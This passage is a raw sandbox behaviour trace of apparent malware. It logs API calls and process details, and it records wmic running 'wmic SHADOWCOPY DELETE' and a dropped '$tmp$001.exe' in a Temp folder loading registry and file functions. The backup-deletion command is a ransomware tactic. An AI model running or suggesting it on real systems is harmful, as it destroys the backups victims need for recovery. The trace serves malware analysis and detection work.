0x11 [0104.002] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.003] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.003] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.003] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.003] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.003] malloc (_Size=0x18) returned 0x1aea68 [0104.003] malloc (_Size=0xc) returned 0x1afcd8 [0104.003] free (_Block=0x1afcd8) [0104.003] malloc (_Size=0xc) returned 0x1afcd8 [0104.003] malloc (_Size=0xc) returned 0x1afcf0 [0104.003] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.003] SysStringLen (param_1="TABLE") returned 0x5 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] SysStringLen (param_1="XML") returned 0x3 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.004] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.004] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.004] malloc (_Size=0x18) returned 0x1aea88 [0104.004] malloc (_Size=0xc) returned 0x1afd08 [0104.004] free (_Block=0x1afd08) [0104.004] malloc (_Size=0xc) returned 0x1afd08 [0104.004] malloc (_Size=0xc) returned 0x1afd20 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="TABLE") returned 0x5 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="XML") returned 0x3 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.005] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.005] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0104.005] malloc (_Size=0x18) returned 0x1aeaa8 [0104.005] malloc (_Size=0xc) returned 0x1afd38 [0104.006] free (_Block=0x1afd38) [0104.006] malloc (_Size=0xc) returned 0x1afd38 [0104.006] malloc (_Size=0xc) returned 0x1afd50 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="TABLE") returned 0x5 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="XML") returned 0x3 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] SysStringLen (param_1="texttablewsys") returned 0xd [0104.006] SysStringLen (param_1="XML") returned 0x3 [0104.006] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.006] malloc (_Size=0x18) returned 0x1aeac8 [0104.007] malloc (_Size=0xc) returned 0x1afd68 [0104.007] free (_Block=0x1afd68) [0104.007] malloc (_Size=0xc) returned 0x1afd68 [0104.007] malloc (_Size=0xc) returned 0x1afd80 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="TABLE") returned 0x5 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="XML") returned 0x3 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="texttablewsys") returned 0xd [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0104.007] SysStringLen (param_1="XML") returned 0x3 [0104.007] SysStringLen (param_1="htable-sortby") returned 0xd [0104.007] malloc (_Size=0x18) returned 0x1aeae8 [0104.008] malloc (_Size=0xc) returned 0x1afd98 [0104.008] free (_Block=0x1afd98) [0104.008] malloc (_Size=0xc) returned 0x1afd98 [0104.008] malloc (_Size=0xc) returned 0x1afdb0 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="TABLE") returned 0x5 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.008] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.008] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.008] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.009] malloc (_Size=0x18) returned 0x1aeb08 [0104.009] malloc (_Size=0xc) returned 0x1afdc8 [0104.009] free (_Block=0x1afdc8) [0104.009] malloc (_Size=0xc) returned 0x1afdc8 [0104.009] malloc (_Size=0xc) returned 0x1afde0 [0104.009] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.009] SysStringLen (param_1="TABLE") returned 0x5 [0104.009] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.009] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.009] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.009] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.010] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.010] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0104.010] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.010] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0104.010] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.010] SysStringLen (param_1="wmiclimofformat") returned 0xf [0104.010] malloc (_Size=0x18) returned 0x1aeb28 [0104.010] malloc (_Size=0xc) returned 0x1afdf8 [0104.010] free (_Block=0x1afdf8) [0104.010] malloc (_Size=0xc) returned 0x1afdf8 [0104.010] malloc (_Size=0xc) returned 0x1afe10 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="TABLE") returned 0x5 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.013] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.013] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.013] malloc (_Size=0x18) returned 0x1aeb48 [0104.013] malloc (_Size=0xc) returned 0x1afe28 [0104.014] free (_Block=0x1afe28) [0104.014] malloc (_Size=0xc) returned 0x1afe28 [0104.014] malloc (_Size=0xc) returned 0x1afe40 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="TABLE") returned 0x5 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0104.014] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0104.014] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0104.014] malloc (_Size=0x18) returned 0x1aeb68 [0104.015] FreeThreadedDOMDocument:IUnknown:Release (This=0x24c4630) returned 0x0 [0104.015] free (_Block=0x1a2f58) [0104.015] GetCommandLineW () returned="wmic SHADOWCOPY DELETE" [0104.015] malloc (_Size=0x30) returned 0x1a3190 [0104.015] memcpy_s (in: _Destination=0x1a3190, _DestinationSize=0x2e, _Source=0x431976, _SourceSize=0x2e | out: _Destination=0x1a3190) returned 0x0 [0104.015] malloc (_Size=0xc) returned 0x1afe58 [0104.015] malloc (_Size=0xc) returned 0x1afe70 [0104.015] malloc (_Size=0xc) returned 0x1afe88 [0104.015] malloc (_Size=0xc) returned 0x2312060 [0104.015] malloc (_Size=0x80) returned 0x23105b0 [0104.015] GetLocalTime (in: lpSystemTime=0xcf908 | out: lpSystemTime=0xcf908*(wYear=0x7e4, wMonth=0x4, wDayOfWeek=0x0, wDay=0x13, wHour=0x16, wMinute=0x1c, wSecond=0xa, wMilliseconds=0x3be)) [0104.015] _vsnwprintf (in: _Buffer=0x23105b0, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0xcf8e8 | out: _Buffer="04-19-2020T22:28:10") returned 19 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.015] malloc (_Size=0x28) returned 0x1a31c8 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.015] malloc (_Size=0x28) returned 0x1a31f8 [0104.015] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] malloc (_Size=0x16) returned 0x1aeb88 [0104.016] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.016] _wcsicmp (_String1="SHADOWCOPY", _String2="\"NULL\"") returned 81 [0104.016] malloc (_Size=0x16) returned 0x1aeba8 [0104.016] malloc (_Size=0x4) returned 0x1a3228 [0104.016] free (_Block=0x0) [0104.016] free (_Block=0x1aeb88) [0104.016] lstrlenW (lpString=" SHADOWCOPY DELETE") returned 19 [0104.016] malloc (_Size=0xe) returned 0x2312078 [0104.016] lstrlenW (lpString="DELETE") returned 6 [0104.016] _wcsicmp (_String1="DELETE", _String2="\"NULL\"") returned 66 [0104.016] malloc (_Size=0xe) returned 0x2312090 [0104.016] malloc (_Size=0x8) returned 0x1a2f58 [0104.016] memmove_s (in: _Destination=0x1a2f58, _DestinationSize=0x4, _Source=0x1a3228, _SourceSize=0x4 | out: _Destination=0x1a2f58) returned 0x0 [0104.016] free (_Block=0x1a3228) [0104.016] free (_Block=0x0) [0104.016] free (_Block=0x2312078) [0104.016] malloc (_Size=0x8) returned 0x1a3228 [0104.016] lstrlenW (lpString="QUIT") returned 4 [0104.016] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.016] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0104.016] lstrlenW (lpString="EXIT") returned 4 [0104.016] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.016] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0104.016] free (_Block=0x1a3228) [0104.016] WbemLocator:IUnknown:AddRef (This=0x2000828) returned 0x2 [0104.016] malloc (_Size=0x8) returned 0x1a3228 [0104.016] lstrlenW (lpString="/") returned 1 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0104.017] lstrlenW (lpString="-") returned 1 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0104.017] lstrlenW (lpString="CLASS") returned 5 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0104.017] lstrlenW (lpString="PATH") returned 4 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0104.017] lstrlenW (lpString="CONTEXT") returned 7 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="SHADOWCOPY", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] malloc (_Size=0x16) returned 0x1aeb88 [0104.017] lstrlenW (lpString="SHADOWCOPY") returned 10 [0104.017] GetCurrentThreadId () returned 0x20c [0104.017] ??0CHString@@QAE@XZ () returned 0xcf85c [0104.017] malloc (_Size=0xc) returned 0x2312078 [0104.017] malloc (_Size=0xc) returned 0x23120a8 [0104.017] WbemLocator:IWbemLocator:ConnectServer (This=0x2000828, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa3c1e0) Thread: id = 58 os_tid = 0x91c Thread: id = 65 os_tid = 0xa1c Thread: id = 66 os_tid = 0x600 Thread: id = 67 os_tid = 0xb64 Thread: id = 68 os_tid = 0xa10 Process: id = "16" image_name = "vssvc.exe" filename = "c:\\windows\\system32\\vssvc.exe" page_root = "0x44618000" os_pid = "0x7dc" os_integrity_level = "0x4000" os_privileges = "0xe60b7e890" monitor_reason = "rpc_server" parent_id = "14" os_parent_pid = "0x1d8" cmd_line = "C:\\Windows\\system32\\vssvc.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:00061926" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 50 os_tid = 0xb0 Thread: id = 51 os_tid = 0xaec Thread: id = 52 os_tid = 0x7ac Thread: id = 53 os_tid = 0x408 [0092.400] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xebd840 | out: lpSystemTimeAsFileTime=0xebd840*(dwLowDateTime=0xf809a340, dwHighDateTime=0x1d61645)) [0092.401] GetCurrentProcessId () returned 0x7dc [0092.401] GetCurrentThreadId () returned 0x408 [0092.401] GetTickCount () returned 0x114bb06 [0092.401] QueryPerformanceCounter (in: lpPerformanceCount=0xebd848 | out: lpPerformanceCount=0xebd848*=21275536400) returned 1 [0092.401] malloc (_Size=0x100) returned 0x3a8e80 Thread: id = 54 os_tid = 0x40c Thread: id = 55 os_tid = 0x64 Thread: id = 56 os_tid = 0x5ac Thread: id = 57 os_tid = 0xa8c Process: id = "17" image_name = "$tmp$001.exe" filename = "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\$tmp$001.exe" page_root = "0x440c0000" os_pid = "0x5f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x620" cmd_line = "C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\$TMP$001.exe" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x5e4 [0100.745] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.749] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0100.749] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.749] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0100.749] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForSingleObject") returned 0x76d41136 [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointer") returned 0x76d417d1 [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetEvent") returned 0x76d416c5 [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0100.750] GetProcAddress (hModule=0x76d30000, lpProcName="ResetEvent") returned 0x76d416dd [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="MulDiv") returned 0x76d41b80 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalUnlock") returned 0x76d5cfdf [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalSize") returned 0x76d5d16f [0100.753] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalLock") returned 0x76d5d0a7 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalFree") returned 0x76d45558 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GlobalAlloc") returned 0x76d4588e [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersionExA") returned 0x76d43519 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLangID") returned 0x76d5d5fd [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeExA") returned 0x76d68266 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0100.754] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocalTime") returned 0x76d45aa6 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetFullPathNameA") returned 0x76d4e2c1 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentVariableA") returned 0x76d433a0 [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetDiskFreeSpaceA") returned 0x76dc433f [0100.755] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatA") returned 0x76d6a959 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageA") returned 0x76d65fbd [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToLocalFileTime") returned 0x76d4e29e [0100.756] GetProcAddress (hModule=0x76d30000, lpProcName="FileTimeToDosDateTime") returned 0x76d5c86d [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="EnumCalendarInfoA") returned 0x76d69e70 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileA") returned 0x76d45444 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="CreateMutexA") returned 0x76d44c6b [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileA") returned 0x76d453c6 [0100.757] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventA") returned 0x76d4328c [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="CopyFileA") returned 0x76d658e5 [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringA") returned 0x76d43c5a [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0100.758] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0100.758] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0100.759] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSection") returned 0x77c72c42 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualFree") returned 0x76d4186e [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualAlloc") returned 0x76d41856 [0100.759] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedDecrement") returned 0x76d413f0 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="InterlockedIncrement") returned 0x76d41400 [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="VirtualQuery") returned 0x76d4445a [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0100.760] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="lstrlenA") returned 0x76d45a4b [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="lstrcpynA") returned 0x76d5192a [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExA") returned 0x76d44913 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetThreadLocale") returned 0x76d435cf [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoA") returned 0x76d40e00 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleA") returned 0x76d41245 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameA") returned 0x76d414b1 [0100.761] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoA") returned 0x76d5d5e5 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineA") returned 0x76d451a1 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibrary") returned 0x76d434c8 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="FindFirstFileA") returned 0x76d4e2ce [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="FindClose") returned 0x76d44442 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0100.762] GetProcAddress (hModule=0x76d30000, lpProcName="RaiseException") returned 0x76d458a6 [0100.763] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0100.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExA") returned 0x777214b3 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyExA") returned 0x77721469 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0100.763] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77710000 [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExA") returned 0x777248ef [0100.763] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExA") returned 0x77724907 [0100.764] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0100.764] LoadLibraryA (lpLibFileName="gdi32.dll") returned 0x770a0000 [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="UnrealizeObject") returned 0x770bc9ae [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetTextColor") returned 0x770b522d [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetROP2") returned 0x770bbc54 [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkMode") returned 0x770b51a2 [0100.764] GetProcAddress (hModule=0x770a0000, lpProcName="SetBkColor") returned 0x770b52d8 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="SelectPalette") returned 0x770b5a86 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="MoveToEx") returned 0x770b8ee6 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetTextMetricsA") returned 0x770bd1f1 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetSystemPaletteEntries") returned 0x770bcf02 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetStockObject") returned 0x770b4eb8 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="GetCurrentPositionEx") returned 0x770b908b [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0100.765] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0100.766] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePenIndirect") returned 0x770c1feb [0100.766] GetProcAddress (hModule=0x770a0000, lpProcName="CreatePalette") returned 0x770b795a [0100.815] GetProcAddress (hModule=0x770a0000, lpProcName="CreateFontIndirectA") returned 0x770bcffd [0100.815] GetProcAddress (hModule=0x770a0000, lpProcName="CreateBrushIndirect") returned 0x770bb385 [0100.815] LoadLibraryA (lpLibFileName="oleaut32.dll") returned 0x76e40000 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayPtrOfIndex") returned 0x76e5e1ce [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetUBound") returned 0x76e5e127 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayGetLBound") returned 0x76e5e173 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="SafeArrayCreate") returned 0x76e5e263 [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="VariantChangeType") returned 0x76e45dee [0100.816] GetProcAddress (hModule=0x76e40000, lpProcName="VariantCopy") returned 0x76e448f1 [0100.816] GetProcAddress (hModule=0x76e40000, 